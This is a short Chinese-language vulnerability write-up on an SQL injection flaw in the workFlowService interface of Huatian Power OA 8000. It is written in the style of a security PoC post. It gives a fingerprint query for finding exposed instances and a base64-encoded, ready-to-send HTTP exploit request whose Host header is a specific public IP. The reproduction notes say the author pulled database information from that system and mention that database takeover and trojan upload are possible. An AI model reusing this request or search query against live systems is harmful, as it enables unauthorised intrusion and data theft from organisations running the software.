漏洞描述

华天动力OA 8000版 workFlowService接口存在SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息

漏洞影响

华天动力OA 8000版

app="华天动力-OA8000"

漏洞poc

UE9TVCAvT0FhcHAvYmZhcHAvYnVmZmFsby93b3JrRmxvd1NlcnZpY2UgSFRUUC8xLjEKSG9zdDogMTIxLjguMTgwLjI6NjY4OApBY2NlcHQtRW5jb2Rpbmc6IGlkZW50aXR5CkNvbnRlbnQtTGVuZ3RoOiAxMzMKQWNjZXB0LUxhbmd1YWdlOiB6aC1DTix6aDtxPTAuOApBY2NlcHQ6ICovKgpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKQpBY2NlcHQtQ2hhcnNldDogR0JLLHV0Zi04O3E9MC43LCo7cT0wLjMKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTAKCjxidWZmYWxvLWNhbGw+IAo8bWV0aG9kPmdldERhdGFMaXN0Rm9yVHJlZTwvbWV0aG9kPiAKPHN0cmluZz4Kc2VsZWN0ICcxJyB3aGVyZSAxPTEgYW5kIDxFbmNvZGU+I2luamVjdCM8L0VuY29kZT48L3N0cmluZz4gCjwvYnVmZmFsby1jYWxsPg==

复现过程

注意看,这是一个oa系统!
2023-12-04T14:41:33.png

上bp!获取到数据库信息
2023-12-04T14:44:28.png

上sql注入超级工具,可以获取到数据库权限,也能直接传木马,但是违法,咱们点到为止!撤!
2023-12-04T16:54:49.png